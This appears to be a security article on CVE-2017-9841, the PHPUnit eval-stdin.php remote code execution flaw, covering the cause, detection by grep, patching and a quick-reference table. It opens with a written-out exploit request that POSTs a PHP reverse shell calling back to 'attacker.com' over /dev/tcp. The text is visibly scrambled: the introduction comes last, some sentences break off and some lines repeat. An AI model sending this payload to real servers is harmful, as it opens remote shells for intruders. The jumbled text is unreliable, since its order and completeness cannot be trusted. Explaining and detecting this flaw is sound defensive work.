POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1 Host: victim.com <?php exec('/bin/bash -c "bash -i >& /dev/tcp/attacker.com/4444 0>&1"'); ?>
grep -r "php://input" vendor/phpunit/ grep -r "eval-stdin" vendor/ Step 1: Immediate Patch (No, Not Just an Update) Simply updating PHPUnit via Composer does not remove the vulnerable file if it already exists. A Composer update adds new versions but leaves old files behind unless you purge first. vendor phpunit phpunit src util php eval-stdin.php cve
As a developer, the lesson is simple: Never routable, never directly accessible. As a security professional, never underestimate the power of simple file existence checks—sometimes the smallest file delivers the biggest breach. Reference Quick Sheet | Item | Value | |------|-------| | Vulnerability | Remote Code Execution (RCE) | | CVE | CVE-2017-9841 | | Affected File | vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php | | Attack Vector | HTTP POST to that file with PHP code in body | | Patch | Remove PHPUnit from production / upgrade to PHPUnit ≥ 7.0 | | Detection | grep -r "eval-stdin" /var/www / web logs for POST to that URI | POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin
The critical oversight: No authentication, no IP whitelisting, no php_sapi_name() check to ensure it runs via CLI. When exposed to a web server, it transforms into an unrestricted RCE gadget. Basic Attack Vector An attacker simply sends a POST request to: As a security professional, never underestimate the power
Introduction: A Tiny File with Catastrophic Consequences In the sprawling ecosystem of PHP dependencies, few files have a reputation as infamous as eval-stdin.php . Tucked deep within the phpunit/phpunit source tree ( src/Util/PHP/eval-stdin.php ), this small script became the epicenter of one of the most widely exploited remote code execution (RCE) vulnerabilities in modern web history: CVE-2017-9841 .